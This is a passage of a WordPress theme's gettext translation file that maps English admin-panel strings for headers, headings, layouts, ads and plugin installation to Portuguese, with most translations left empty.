templates/header/templates.php:615 msgid "Have an existing account?" msgstr "Já tem uma conta?" #: backend/panels/header.php:16 msgid "Header" msgstr "" #: backend/panels/amp.php:300 msgid "Header - Ad Type" msgstr "" #: backend/panels/amp.php:328 msgid "Header - Adsense Size" msgstr "" #: backend/panels/amp.php:340 msgid "Header - AMP Custom Ad Script" msgstr "" #: backend/panels/amp.php:312 msgid "Header - Data Ad Client" msgstr "" #: backend/panels/amp.php:320 msgid "Header - Data Ad Slot" msgstr "" #: backend/panels/amp.php:294 msgid "Header Ad Settings" msgstr "" #: includes/sidebars.php:79 msgid "Header Advertising" msgstr "" #: backend/single-metaboxes.php:153 backend/single-metaboxes.php:930 msgid "Header Alert Bar" msgstr "" #: backend/panels/blog-pages.php:1968 backend/panels/header.php:408 #: backend/panels/header.php:462 msgid "Header Background" msgstr "" #: backend/category-settings.php:92 backend/panels/blog-pages.php:90 #: backend/panels/blog-pages.php:1084 backend/panels/blog-pages.php:1492 msgid "Header Background Style" msgstr "" #: backend/panels/header-style.php:80 msgid "Header Height" msgstr "" #: backend/panels/blog-pages.php:2390 msgid "Header Image" msgstr "" #: backend/panels/typography.php:893 msgid "Header Menus" msgstr "" #: backend/panels/header.php:738 msgid "Header Mini Cart" msgstr "" #: backend/panels/header.php:173 msgid "Header Search" msgstr "" #: backend/panels/header.php:195 msgid "Header Search Icon" msgstr "" #: backend/category-settings.php:56 backend/panels/blog-pages.php:37 #: backend/panels/blog-pages.php:603 backend/panels/blog-pages.php:1921 #: backend/panels/single-post.php:1555 backend/single-metaboxes.php:890 msgid "Header Style" msgstr "" #: backend/panels/header-style.php:15 msgid "Header Style 1,2,3" msgstr "" #: backend/panels/header-style.php:309 msgid "Header Style 4" msgstr "" #: backend/panels/header-style.php:560 msgid "Header Style 5" msgstr "" #: backend/category-settings.php:64 backend/panels/blog-pages.php:60 #: backend/panels/blog-pages.php:626 backend/panels/blog-pages.php:1944 #: backend/panels/woocommerce.php:60 backend/single-metaboxes.php:121 #: backend/single-metaboxes.php:898 msgid "Header Template Shortcode" msgstr "" #: backend/panels/header-style.php:56 backend/panels/header-style.php:350 #: backend/panels/header-style.php:601 msgid "Header Width" msgstr "" #: backend/category-settings.php:182 backend/panels/blog-pages.php:204 #: backend/panels/blog-pages.php:2404 msgid "Heading" msgstr "" #: backend/panels/bookmark.php:133 backend/panels/bookmark.php:483 msgid "Heading background Style" msgstr "" #: backend/panels/heading.php:129 msgid "Heading Color" msgstr "" #: backend/panels/heading.php:15 msgid "Heading Design" msgstr "" #: backend/panels/typography.php:1038 msgid "Heading Font" msgstr "" #: backend/category-settings.php:205 backend/panels/blog-pages.php:227 #: backend/panels/bookmark.php:540 backend/panels/single-post.php:1327 msgid "Heading Font Size (Desktop)" msgstr "" #: backend/category-settings.php:197 backend/panels/blog-pages.php:219 #: backend/panels/bookmark.php:532 backend/panels/single-post.php:1319 msgid "Heading HTML Tag" msgstr "" #: backend/category-settings.php:189 backend/panels/blog-pages.php:211 #: backend/panels/bookmark.php:524 backend/panels/single-post.php:1311 msgid "Heading Layout" msgstr "" #: backend/panels/table-contents.php:50 msgid "Heading Tag Supported" msgstr "" #: backend/panels/typography.php:1039 msgid "" "Heading tag will use default H tag font settings. Select font values if you " "would like to choose a custom font." msgstr "" #: backend/single-metaboxes.php:750 msgid "Headings Table" msgstr "" #: templates/header/templates.php:289 msgid "Hi," msgstr "Olá," #: backend/panels/single-post.php:1442 msgid "" "Hide a part of content of next posts and show the button to increase page " "views." msgstr "" #: backend/panels/single-post.php:402 msgid "Hide Next/Prev Post pagination on the mobile device." msgstr "" #: backend/configs.php:861 msgid "Hide on Desktop" msgstr "" #: backend/panels/single-post.php:1465 msgid "Hide Sidebar on Mobile" msgstr "" #: backend/category-settings.php:466 backend/panels/block-classic.php:130 #: backend/panels/block-grid.php:130 backend/panels/block-grid.php:295 #: backend/panels/block-grid.php:460 backend/panels/block-grid.php:633 #: backend/panels/block-grid.php:820 backend/panels/block-list.php:138 #: backend/panels/block-list.php:311 backend/panels/block-list.php:492 #: backend/panels/block-list.php:687 backend/panels/blog-pages.php:491 #: backend/panels/blog-pages.php:978 backend/panels/blog-pages.php:1392 #: backend/panels/blog-pages.php:1800 backend/panels/blog-pages.php:2292 #: backend/panels/bookmark.php:390 backend/panels/bookmark.php:838 msgid "Hide the entry category on the tablet and mobile devices." msgstr "" #: backend/category-settings.php:496 backend/panels/block-classic.php:156 #: backend/panels/block-grid.php:156 backend/panels/block-grid.php:321 #: backend/panels/block-grid.php:486 backend/panels/block-grid.php:659 #: backend/panels/block-grid.php:846 backend/panels/block-list.php:164 #: backend/panels/block-list.php:337 backend/panels/block-list.php:518 #: backend/panels/block-list.php:713 backend/panels/blog-pages.php:521 #: backend/panels/blog-pages.php:1008 backend/panels/blog-pages.php:1422 #: backend/panels/blog-pages.php:1830 backend/panels/blog-pages.php:2322 #: backend/panels/bookmark.php:412 backend/panels/bookmark.php:868 msgid "Hide the post excerpt on the tablet and mobile devices." msgstr "" #: backend/panels/single-post.php:1466 msgid "Hide the post sidebar on the mobile device when load next posts." msgstr "" #: backend/panels/header.php:712 msgid "Hide this bar on the sticky navigation." msgstr "" #: backend/panels/header.php:711 msgid "Hide when Sticky" msgstr "" #: backend/mega-menu.php:142 msgid "Hierarchical" msgstr "" #: backend/category-settings.php:30 backend/panels/design.php:44 msgid "Highlight Color" msgstr "" #: backend/panels/color.php:23 msgid "Highlight Colors" msgstr "" #: backend/panels/single-post.php:544 msgid "Highlight Heading" msgstr "" #: backend/single-metaboxes.php:212 msgid "Highlight Point" msgstr "" #: backend/panels/single-post.php:1490 backend/panels/single-post.php:1499 msgid "Highlight Shares" msgstr "" #: backend/panels/single-post.php:546 msgid "Highlights" msgstr "" #: backend/panels/optimized.php:181 msgid "Home Description" msgstr "" #: backend/panels/header-style.php:140 backend/panels/header-style.php:218 #: backend/panels/header-style.php:284 backend/panels/header-style.php:428 #: backend/panels/header-style.php:507 backend/panels/header-style.php:695 #: backend/panels/header-style.php:773 msgid "Hover Accent Color" msgstr "" #: backend/panels/design.php:567 msgid "Hover Effects" msgstr "" #: backend/panels/header-style.php:132 backend/panels/header-style.php:210 #: backend/panels/header-style.php:276 backend/panels/header-style.php:420 #: backend/panels/header-style.php:499 backend/panels/header-style.php:687 #: backend/panels/header-style.php:765 msgid "Hover Text Color" msgstr "" #: backend/panels/single-post.php:529 msgid "HTML Tag" msgstr "" #: backend/panels/design.php:180 msgid "Human Time Format" msgstr "" #: backend/panels/single-post.php:218 msgid "Hyperlink Color" msgstr "" #: backend/panels/single-post.php:200 msgid "Hyperlink Settings" msgstr "" #: backend/panels/single-post.php:205 msgid "Hyperlink Style" msgstr "" #: backend/panels/single-post.php:234 msgid "Hyperlink Underline" msgstr "" #: backend/panels/header.php:550 msgid "Icon" msgstr "" #: backend/mega-menu.php:238 msgid "Icon Classname" msgstr "" #: backend/panels/ads.php:39 msgid "" "If you use auto ads code, you need to disable any other adsense units code." msgstr "" #: backend/panels/design.php:246 msgid "" "If you use font Awesome. ensure that the setting in \"Theme Design > Font " "Awesome\" is enabled." msgstr "" #: backend/single-metaboxes.php:344 backend/single-metaboxes.php:392 msgid "Iframe Embed Code" msgstr "" #: backend/panels/dark-mode.php:35 msgid "Image Opacity" msgstr "" #: backend/panels/typography.php:488 msgid "Important Meta Font" msgstr "" #: backend/panels/header-style.php:89 backend/panels/header-style.php:377 #: backend/panels/header-style.php:644 msgid "" "In case you would like to switch layout and text to light when set a dark " "background for sub menu in light mode." msgstr "" #: backend/panels/single-post.php:1374 msgid "Infinite Scroll" msgstr "" #: backend/configs.php:563 backend/panels/bookmark.php:575 msgid "Infinite Scroll (Ajax)" msgstr "" #: backend/panels/amp.php:541 msgid "Inline - Ad Type" msgstr "" #: backend/panels/amp.php:569 msgid "Inline - Adsense Size" msgstr "" #: backend/panels/amp.php:581 msgid "Inline - AMP Custom Ad Script" msgstr "" #: backend/panels/amp.php:553 msgid "Inline - Data Ad Client" msgstr "" #: backend/panels/amp.php:561 msgid "Inline - Data Ad Slot" msgstr "" #: backend/panels/single-post.php:1259 msgid "Inline Content Related Box" msgstr "" #: backend/panels/ads.php:265 msgid "Inline Single Content" msgstr "" #: backend/panels/amp.php:535 msgid "Inline Single Content Ad Settings" msgstr "" #: backend/panels/typography.php:593 msgid "Input & Textarea Font" msgstr "" #: backend/panels/blog-pages.php:154 backend/panels/blog-pages.php:1107 #: backend/panels/blog-pages.php:1516 backend/panels/blog-pages.php:2008 msgid "" "Input a \"Ruby Template\" shortcode to display as the main blog posts, ie: " "[Ruby_E_Template id=\"1\"]." msgstr "" #: backend/panels/blog-pages.php:120 msgid "" "Input a \"Ruby Template\" shortcode to embed it after the category header, " "ie: [Ruby_E_Template id=\"1\"]" msgstr "" #: backend/category-settings.php:130 msgid "" "Input a \"Ruby Template\" shortcode to embed it after this category header, " "ie: [Ruby_E_Template id=\"1\"]" msgstr "" #: backend/panels/blog-pages.php:659 msgid "" "Input a \"Ruby Template\" shortcode to embed it the bottom of the blog page, " "ie: [Ruby_E_Template id=\"1\"]" msgstr "" #: backend/panels/blog-pages.php:650 msgid "" "Input a \"Ruby Template\" shortcode to embed it the top of the blog page, ie:" " [Ruby_E_Template id=\"1\"]" msgstr "" #: backend/category-settings.php:156 msgid "" "Input a \"Ruby Template\" shortcode to show it as a the main blog listing " "for this category." msgstr "" #: backend/panels/blog-pages.php:692 msgid "" "Input a \"Ruby Template\" shortcode to show it as a the main blog listing." msgstr "" #: backend/panels/design.php:330 msgid "Input a custom crop size: width x height. For example: 300x200" msgstr "" #: backend/panels/single-post.php:498 msgid "Input a custom font size value (in px) for the single entry category." msgstr "" #: backend/panels/blog-pages.php:228 msgid "" "Input a custom font size value for the category heading (px) on the desktop." msgstr "" #: backend/category-settings.php:206 msgid "" "Input a custom font size value for this heading (px) on the desktop. Leave " "this option blank to set the default value." msgstr "" #: backend/panels/bookmark.php:541 backend/panels/single-post.php:1328 msgid "" "Input a custom font size value for this heading (px) on the desktop. Leave " "this option blank to set the default." msgstr "" #: backend/panels/header.php:603 msgid "Input a custom forget password URL if have." msgstr "" #: backend/panels/single-post.php:1754 msgid "" "Input a custom height value (px) for this bar. Leave blank to set it as the " "default." msgstr "" #: backend/panels/header.php:354 msgid "Input a custom height value for the mobile navigation, Default is 40px." msgstr "" #: backend/panels/header.php:596 msgid "Input a custom register URL if have." msgstr "" #: backend/panels/design.php:686 msgid "Input a custom round corner (in px) for your website." msgstr "" #: backend/panels/design.php:436 msgid "" "Input a custom time value to next a slide in milliseconds (default is 5000)." msgstr "" #: backend/panels/ads.php:495 msgid "" "Input a delay time (ms) value to show the slide up after the site loaded." msgstr "" #: backend/panels/adblock.php:34 msgid "Input a description for the adblock popup." msgstr "" #: backend/panels/ads.php:410 msgid "Input a description for the adverting box." msgstr "" #: backend/panels/header.php:566 msgid "" "Input a description for the login form. Leave blank to set it as the default." msgstr "" #: backend/panels/header.php:278 msgid "Input a destination URL for the notification panel." msgstr "" #: backend/panels/footer.php:208 msgid "Input a font size value (in px) for the copy right text." msgstr "" #: backend/panels/footer.php:114 msgid "" "Input a font size value (in px) for the default menu widgets are displaying " "in the footer." msgstr "" #: backend/panels/footer.php:214 msgid "Input a font size value (in px) for the footer copyright menu." msgstr "" #: backend/panels/newsletter.php:56 msgid "Input a footer text for the box." msgstr "" #: backend/panels/header.php:188 msgid "Input a heading for displaying above the search form." msgstr "" #: backend/panels/blog-pages.php:2405 msgid "" "Input a heading for the 404 page. Leave this option blank to set it as the " "default." msgstr "" #: backend/panels/single-post.php:545 msgid "Input a heading for the highlights section if it is existing." msgstr "" #: backend/panels/header.php:559 msgid "Input a heading for the login form." msgstr "" #: backend/panels/blog-pages.php:205 msgid "" "Input a heading for the post listing. Leave blank to disable this section" msgstr "" #: backend/category-settings.php:183 msgid "" "Input a heading for the post listing. Leave this option blank to set the " "default." msgstr "" #: backend/panels/bookmark.php:105 backend/panels/bookmark.php:448 #: backend/panels/bookmark.php:519 msgid "Input a heading for this section." msgstr "" #: backend/panels/single-post.php:1305 msgid "Input a heading for this section. Leave -1 to disable this heading." msgstr "" #: backend/panels/amp.php:98 backend/panels/footer.php:159 msgid "Input a height for value for the footer logo, Default is 50px." msgstr "" #: backend/panels/header-style.php:369 backend/panels/header-style.php:636 msgid "Input a max height value for the logo of this header. Default is 60." msgstr "" #: backend/panels/ads.php:201 backend/panels/ads.php:390 msgid "" "Input a max width value (in px) for your ad image, leave blank set full size." msgstr "" #: backend/panels/single-post.php:1133 msgid "Input a meta text for the sponsored posts." msgstr "" #: backend/panels/table-contents.php:126 msgid "" "Input a minimum value for total heading tags to show the table of contents " "box." msgstr "" #: backend/panels/newsletter.php:49 msgid "Input a newsletter shortcode." msgstr "" #: backend/single-metaboxes.php:581 msgid "Input a offer label (Call to action) for this product review." msgstr "" #: backend/panels/single-post.php:1276 msgid "Input a position (after x paragraphs) to display the related bõ." msgstr "" #: backend/panels/table-contents.php:142 msgid "" "Input a position (after x paragraphs) to display the table of contents box." msgstr "" #: backend/single-metaboxes.php:737 msgid "" "Input a position (after x paragraphs) to display the table of contents box. " "Leave blank to use the theme option setting, Set \"-1\" for displaying at " "the top." msgstr "" #: backend/panels/ads.php:429 backend/panels/amp.php:589 msgid "Input a position (after x paragraphs) to display your ads." msgstr "" #: backend/panels/header.php:589 msgid "Input a redirect URL when the user logged in." msgstr "" #: backend/panels/single-post.php:1267 msgid "Input a related shortcode you want to display." msgstr "" #: backend/single-metaboxes.php:173 msgid "" "Input a Ruby Template shortcode for displaying as the website footer for " "this page, Leave blank to set it as the default from the Theme Options panel." msgstr "" #: backend/single-metaboxes.php:950 msgid "" "Input a Ruby Template shortcode for displaying as the website footer for " "this post, Leave blank to set it as the default from the Theme Options panel." msgstr "" #: backend/panels/blog-pages.php:627 msgid "" "Input a Ruby Template shortcode for displaying as the website header for the " "blog page." msgstr "" #: backend/panels/blog-pages.php:61 msgid "" "Input a Ruby Template shortcode for displaying as the website header for the " "category pages." msgstr "" #: backend/panels/blog-pages.php:1945 msgid "" "Input a Ruby Template shortcode for displaying as the website header for the " "search page." msgstr "" #: backend/category-settings.php:65 msgid "" "Input a Ruby Template shortcode for displaying as the website header for " "this category. Leave blank to use the above setting." msgstr "" #: backend/single-metaboxes.php:122 msgid "" "Input a Ruby Template shortcode for displaying as the website header for " "this page. Leave this option blank to set as the above setting." msgstr "" #: backend/single-metaboxes.php:899 msgid "" "Input a Ruby Template shortcode for displaying as the website header for " "this page. This setting requests to select \"Use Ruby Template\" in site " "header setting in order to work." msgstr "" #: backend/panels/header.php:60 msgid "Input a Ruby Template shortcode for displaying as the website header." msgstr "" #: backend/single-metaboxes.php:541 msgid "" "Input a short description to display before the review score, For example: " "Good, Bad..." msgstr "" #: backend/single-metaboxes.php:668 msgid "" "Input a starting view value for this post. Leave blank if you want to " "display real data." msgstr "" #: backend/single-metaboxes.php:199 msgid "" "Input a tagline for this post, It will display under the single post title." msgstr "" #: backend/panels/ads.php:470 msgid "" "Input a template shortcode or any other shortcode you would like to show in " "this section." msgstr "" #: backend/panels/adblock.php:27 msgid "Input a title for the adblock popup." msgstr "" #: backend/panels/reaction.php:32 msgid "" "Input a title for the reaction section. Leave blank to set it as the default." msgstr "" #: backend/single-metaboxes.php:497 msgid "Input a title for this review section." msgstr "" #: backend/panels/design.php:69 msgid "" "Input a value to limited numbers of entry category show on all post listing " "layout, useful in case you have many categories per post." msgstr "" #: backend/mega-menu.php:205 msgid "" "Input a width value (in px) for this mega section. Leave blank or 0 to set " "to full width." msgstr "" #: backend/panels/header.php:142 msgid "" "Input a width value (in px) for this section. Leave blank to set a the " "default." msgstr "" #: backend/single-metaboxes.php:547 msgid "Input advantages for this review." msgstr "" #: backend/mega-menu.php:243 msgid "Input attachment image/SVG url to show your icon." msgstr "" #: backend/single-metaboxes.php:259 msgid "Input attribution for the featured image." msgstr "" #: backend/single-metaboxes.php:252 msgid "Input caption text for the featured image." msgstr "" #: backend/panels/header-style.php:629 msgid "" "Input custom height value (px) for the navigation bar of this header. " "Default is 40px." msgstr "" #: backend/panels/header-style.php:362 msgid "Input custom height value (px) for the navigation bar. Default is 40." msgstr "" #: backend/panels/header-style.php:81 msgid "Input custom height value (px) for this header. Default is 60." msgstr "" #: backend/category-settings.php:337 backend/panels/blog-pages.php:359 #: backend/panels/blog-pages.php:846 backend/panels/blog-pages.php:1260 #: backend/panels/blog-pages.php:1668 backend/panels/blog-pages.php:2160 #: backend/panels/bookmark.php:259 backend/panels/bookmark.php:707 msgid "" "Input custom ratio percent (height*100/width) for featured image you would " "like. For example: 50" msgstr "" #: backend/panels/general.php:35 msgid "" "Input default placeholder text for the search form, leave blank to set it as " "the default." msgstr "" #: backend/panels/newsletter.php:42 msgid "Input description for the popup newsletter form" msgstr "" #: backend/panels/bookmark.php:112 backend/panels/bookmark.php:455 msgid "Input description for this section." msgstr "" #: backend/single-metaboxes.php:561 msgid "Input disadvantages for this review." msgstr "" #: backend/category-settings.php:488 msgid "" "Input entry meta tags to hide on the mobile devices, separate by comma. For " "example: avatar, author... Keys include: [avatar, author, date, category, " "tag, view, comment, update, read, custom]. Input -1 to re-enable all meta." msgstr "" #: backend/panels/blog-pages.php:513 backend/panels/blog-pages.php:1000 #: backend/panels/blog-pages.php:1414 backend/panels/blog-pages.php:1822 #: backend/panels/blog-pages.php:2314 backend/panels/bookmark.php:860 msgid "" "Input entry meta tags to hide on the mobile devices, separate by comma. For " "example: avatar, author... Keys include: [avatar, author, date, category, " "tag, view, comment, update, read, custom]. Input -1 to re-enable all tags." msgstr "" #: backend/category-settings.php:480 msgid "" "Input entry meta tags to hide on the tablet devices, separate by comma. For " "example: avatar, author... Keys include: [avatar, author, date, category, " "tag, view, comment, update, read, custom]. Input -1 to re-enable all meta." msgstr "" #: backend/panels/blog-pages.php:505 backend/panels/blog-pages.php:992 #: backend/panels/blog-pages.php:1406 backend/panels/blog-pages.php:1814 #: backend/panels/blog-pages.php:2306 backend/panels/bookmark.php:852 #: backend/panels/single-post.php:609 backend/panels/single-post.php:618 msgid "" "Input entry meta tags to hide on the tablet devices, separate by comma. For " "example: avatar, author... Keys include: [avatar, author, date, category, " "tag, view, comment, update, read, custom]. Input -1 to re-enable all tags." msgstr "" #: backend/category-settings.php:359 msgid "" "Input entry meta tags to show. Separated by commas (for example: author,date)" ". All meta keys include: [author, date, category, tag, view, comment, update," " read, custom]" msgstr "" #: backend/single-metaboxes.php:575 msgid "Input final summary for this review." msgstr "" #: backend/panels/typography.php:587 msgid "Input Font Settings" msgstr "" #: backend/single-metaboxes.php:757 msgid "Input Heading" msgstr "" #: backend/single-metaboxes.php:206 msgid "" "Input highlights for this post. This section will appear a the top of " "content. To edit this section heading, Navigate to Theme Options > Single " "Post > Tagline & highlights" msgstr "" #: backend/single-metaboxes.php:393 msgid "Input iframe embed code if WordPress cannot support your audio URL." msgstr "" #: backend/single-metaboxes.php:345 msgid "Input iframe embed code if WordPress cannot support your video URL." msgstr "" #: backend/panels/bookmark.php:72 msgid "" "Input max expiration (days) to save bookmarks for the guest users. Set 0 for " "no expiration." msgstr "" #: backend/panels/design.php:166 msgid "" "Input number of words per minute to calculate the reading time. Default is " "130" msgstr "" #: backend/single-metaboxes.php:599 msgid "Input the currency of the price." msgstr "" #: backend/panels/amp.php:313 backend/panels/amp.php:373 #: backend/panels/amp.php:433 backend/panels/amp.php:494 #: backend/panels/amp.php:554 msgid "Input the data-ad-client number ID (without ca-pub-)." msgstr "" #: backend/panels/amp.php:321 backend/panels/amp.php:381 #: backend/panels/amp.php:441 backend/panels/amp.php:502 #: backend/panels/amp.php:562 msgid "Input the data-ad-slot number ID." msgstr "" #: backend/single-metaboxes.php:587 msgid "Input the destination URL of the offer." msgstr "" #: backend/panels/bookmark.php:478 msgid "Input the follow page URL for user can redirect to add their interests." msgstr "" #: backend/panels/header.php:157 backend/panels/header.php:389 msgid "" "Input the footer copyright text to display at the bottom of this section, " "allow raw HTML." msgstr "" #: backend/single-metaboxes.php:751 msgid "" "Input the heading for each page corresponding to the page break tags. Please " "input all headings for pages to show the section." msgstr "" #: backend/panels/table-contents.php:133 msgid "Input the heading for the table of contents box." msgstr "" #: backend/panels/design.php:238 msgid "Input the label for this meta." msgstr "" #: backend/panels/socials.php:190 backend/panels/socials.php:217 #: backend/panels/socials.php:244 msgid "Input the name of font icon, for example: \"fab fa-facebook\"." msgstr "" #: backend/panels/socials.php:184 backend/panels/socials.php:211 #: backend/panels/socials.php:238 msgid "Input the name of the social, for example: facebook, twitter." msgstr "" #: backend/single-metaboxes.php:772 msgid "" "Input the post source if it has, it will display at the bottom of post " "content" msgstr "" #: backend/single-metaboxes.php:793 msgid "" "Input the post via if it has, it will display at the bottom of post content" msgstr "" #: backend/single-metaboxes.php:593 msgid "Input the price of the offer." msgstr "" #: backend/panels/design.php:544 msgid "" "Input the read more label to display on your website. Default is \"Read " "More\"." msgstr "" #: backend/panels/bookmark.php:64 msgid "" "Input the redirect URL when user logged. Leave this option blank to set the " "default value." msgstr "" #: backend/single-metaboxes.php:630 msgid "Input the sponsor brand name for this post" msgstr "" #: backend/single-metaboxes.php:623 msgid "Input the sponsor website URL." msgstr "" #: backend/panels/newsletter.php:35 msgid "Input title for the popup newsletter form" msgstr "" #: backend/single-metaboxes.php:290 msgid "" "Input value or text for the custom meta that you created in Theme Options " "panel." msgstr "" #: backend/panels/single-post.php:349 msgid "Input your a description for your newsletter." msgstr "" #: backend/panels/single-post.php:342 msgid "Input your a heading for your newsletter section." msgstr "" #: backend/panels/single-post.php:356 msgid "" "Input your a newsletter (subscribe) shortcode or script to show at bottom " "entry content." msgstr "" #: backend/panels/ads.php:194 backend/panels/ads.php:383 msgid "Input your ad destination URL." msgstr "" #: backend/panels/ads.php:123 msgid "Input your ad script code." msgstr "" #: backend/panels/header.php:667 msgid "Input your alert content to show." msgstr "" #: backend/panels/header.php:674 msgid "Input your alert URL." msgstr "" #: backend/panels/amp.php:262 msgid "Input your amp auto ads code." msgstr "" #: backend/panels/amp.php:341 backend/panels/amp.php:401 #: backend/panels/amp.php:461 backend/panels/amp.php:522 #: backend/panels/amp.php:582 msgid "Input your AMP custom ad script." msgstr "" #: backend/single-metaboxes.php:387 msgid "" "Input your audio URL, support: SoundCloud, MixCloud. Do not forget to check " "\"Audio\" in Post Format section." msgstr "" #: backend/panels/ads.php:50 msgid "Input your auto ads code." msgstr "" #: backend/panels/optimized.php:203 msgid "input your company city and country address." msgstr "" #: backend/panels/optimized.php:217 msgid "input your company local postal code." msgstr "" #: backend/panels/optimized.php:196 msgid "input your company main email." msgstr "" #: backend/panels/optimized.php:189 msgid "input your company phone number." msgstr "" #: backend/panels/optimized.php:210 msgid "input your company street address." msgstr "" #: backend/panels/footer.php:192 msgid "input your copyright text or HTML." msgstr "" #: backend/panels/ads.php:312 msgid "Input your custom ad script code or Adsense." msgstr "" #: backend/panels/design.php:245 msgid "" "Input your custom CSS icon classname to display at the beginning of the meta." msgstr "" #: backend/panels/blog-pages.php:2412 msgid "" "Input your description for the 404 page. Leave this option blank to set it " "as the default." msgstr "" #: backend/panels/optimized.php:245 msgid "input your facebook app ID for OG tags." msgstr "" #: backend/panels/single-post.php:363 msgid "Input your policy text for the newsletter form, row HTML allowed." msgstr "" #: backend/panels/privacy.php:34 msgid "Input your privacy or cookie content for your website, allow raw HTML." msgstr "" #: backend/panels/socials.php:29 backend/panels/socials.php:36 #: backend/panels/socials.php:43 backend/panels/socials.php:50 #: backend/panels/socials.php:56 backend/panels/socials.php:63 #: backend/panels/socials.php:69 backend/panels/socials.php:75 #: backend/panels/socials.php:81 backend/panels/socials.php:87 #: backend/panels/socials.php:93 backend/panels/socials.php:99 #: backend/panels/socials.php:105 backend/panels/socials.php:111 #: backend/panels/socials.php:117 backend/panels/socials.php:123 #: backend/panels/socials.php:129 backend/panels/socials.php:135 #: backend/panels/socials.php:141 backend/panels/socials.php:147 #: backend/panels/socials.php:153 msgid "Input your social profile URL, Leave blank if you want to disable it." msgstr "" #: backend/panels/socials.php:178 backend/panels/socials.php:205 #: backend/panels/socials.php:232 msgid "Input your social profile URL." msgstr "" #: backend/panels/woocommerce.php:61 msgid "" "Input your template shortcode you would like to use Elementor builder to " "create a featured section at the top of shop page." msgstr "" #: backend/panels/footer.php:122 msgid "Input your template shortcode you would like to use Elementor builder." msgstr "" #: backend/single-metaboxes.php:332 msgid "Input your video link, support: Youtube, Vimeo, DailyMotion." msgstr "" #: backend/panels/typography.php:578 msgid "Inputs & Button" msgstr "" #: templates/parts.php:603 msgid "Instagram" msgstr "" #: backend/panels/socials.php:49 msgid "Instagram URL" msgstr "" #: backend/class-tgm-plugin-activation.php:2811 msgid "Install" msgstr "" #: backend/class-tgm-plugin-activation.php:2697 #, php-format msgid "Install %2$s" msgstr "" #: backend/class-tgm-plugin-activation.php:340 backend/install-plugins.php:67 msgid "Install Plugins" msgstr "" #: backend/class-tgm-plugin-activation.php:339 backend/install-plugins.php:66 msgid "Install Required Plugins" msgstr "" #: backend/class-tgm-plugin-activation.php:2413 msgid "Installed But Not Activated" msgstr "" #: backend/class-tgm-plugin-activation.php:2584 msgid "Installed version:" msgstr "" #: backend/class-tgm-plugin-activation.php:3606 #, php-format msgid "Installing and Activating Plugin %1$s (%2$d/%3$d)" msgstr "" #: backend/class-tgm-plugin-activation.php:3614 #, php-format msgid "Installing Plugin %1$s (%2$d/%3$d)" msgstr "" #: backend/class-tgm-plugin-activation.php:342 backend/install-plugins.php:68 #, php-format msgid "Installing Plugin: %s" msgstr "" #: backend/panels/logo.php:159 msgid "iOS Bookmarklet Icon" msgstr "" #: backend/single-metaboxes.php:276 msgid "" "It is useful in case this post has a lot of categories and you want to " "display only one in listings." msgstr "" #: templates/blog.php:19 msgid "It looks like nothing was found at this location. Maybe try a search?" msgstr "" #: templates/page.php:124 msgid "" "It looks like nothing was found at this location. The page you were looking " "for does not exist or was loading incorrectly." msgstr "" #: templates/blog.php:501 msgid "" "It seems we can’t find what you’re looking for. Perhaps searching can help." msgstr "" "Parece que não conseguimos encontrar o que você está procurando. Talvez " "pesquisar possa ajudar." #: backend/panels/footer.php:55 msgid "It will be helpful if you have not set up footer background." msgstr "" #: backend/single-metaboxes.php:552 backend/single-metaboxes.php:566 msgid "Item" msgstr "" #: backend/single-metaboxes.php:521 msgid "Item Label" msgstr "" #: backend/panels/optimized.php:144 msgid "ItemList (Carousel) Markup" msgstr "" #: backend/panels/newsletter.php:36 msgid "Join Us!" msgstr "" #: backend/panels/reaction.php:53 msgid "Joy" msgstr "" #: includes/fallbacks.php:167 msgid "k" msgstr "" #: backend/configs.php:857 msgid "Large Leaderboard (970x90)" msgstr "" #: backend/configs.php:853 msgid "Large Rectangle (336x280)" msgstr "" #: backend/panels/single-post.php:632 backend/panels/single-post.php:638 msgid "Last Updated Date" msgstr "" #: includes/menu.php:325 templates/header/templates.php:727 msgid "Latest News" msgstr "" #: backend/category-settings.php:177 backend/panels/blog-pages.php:195 msgid "Latest Posts - Heading" msgstr "" #: backend/category-settings.php:233 backend/panels/blog-pages.php:244 msgid "Latest Posts - Layout" msgstr "" #: backend/category-settings.php:213 backend/panels/blog-pages.php:541 msgid "Latest Posts - Pagination" msgstr "" #: backend/category-settings.php:290 backend/panels/blog-pages.php:298 msgid "Latest Posts - Sidebar" msgstr "" #: backend/panels/bookmark.php:589 msgid "Layout" msgstr "" #: backend/panels/table-contents.php:110 backend/single-metaboxes.php:722 msgid "layout" msgstr "" #: backend/configs.php:107 backend/configs.php:638 backend/configs.php:697 #: backend/configs.php:736 backend/configs.php:775 msgid "Layout 1" msgstr "" #: backend/configs.php:120 msgid "Layout 1 - Center" msgstr "" #: backend/configs.php:116 msgid "Layout 10" msgstr "" #: backend/configs.php:129 msgid "Layout 10 - Center" msgstr "" #: backend/configs.php:117 msgid "Layout 11" msgstr "" #: backend/configs.php:130 msgid "Layout 11 - Center" msgstr "" #: backend/configs.php:118 msgid "Layout 12" msgstr "" #: backend/configs.php:131 msgid "Layout 12 - Center" msgstr "" #: backend/configs.php:119 msgid "Layout 13" msgstr "" #: backend/configs.php:132 msgid "Layout 13 - Center" msgstr "" #: backend/configs.php:108 backend/configs.php:642 backend/configs.php:701 #: backend/configs.php:740 backend/configs.php:779 msgid "Layout 2" msgstr "" #: backend/configs.php:121 msgid "Layout 2 - Center" msgstr "" #: backend/configs.php:109 backend/configs.php:646 backend/configs.php:705 #: backend/configs.php:744 backend/configs.php:783 msgid "Layout 3" msgstr "" #: backend/configs.php:122 msgid "Layout 3 - Center" msgstr "" #: backend/configs.php:110 backend/configs.php:650 backend/configs.php:709 #: backend/configs.php:748 msgid "Layout 4" msgstr "" #: backend/configs.php:123 msgid "Layout 4 - Center" msgstr "" #: backend/configs.php:111 backend/configs.php:654 msgid "Layout 5" msgstr "" #: backend/configs.php:124 msgid "Layout 5 - Center" msgstr "" #: backend/configs.php:112 backend/configs.php:658 msgid "Layout 6" msgstr "" #: backend/configs.php:125 msgid "Layout 6 - Center" msgstr "" #: backend/configs.php:113 backend/configs.php:662 msgid "Layout 7" msgstr "" #: backend/configs.php:126 msgid "Layout 7 - Center" msgstr "" #: backend/configs.php:114 backend/configs.php:666 msgid "Layout 8" msgstr "" #: backend/configs.php:127 msgid "Layout 8 - Center" msgstr "" #: backend/configs.php:115 msgid "Layout 9" msgstr "" #: backend/configs.php:128 msgid "Layout 9 - Center" msgstr "" #: backend/panels/login.php:20 backend/panels/table-contents.php:105 msgid "Layout Settings" msgstr "" #: backend/panels/single-post.php:28 msgid "Layouts" msgstr "" #: backend/panels/optimized.php:27 msgid "Lazy Load Featured 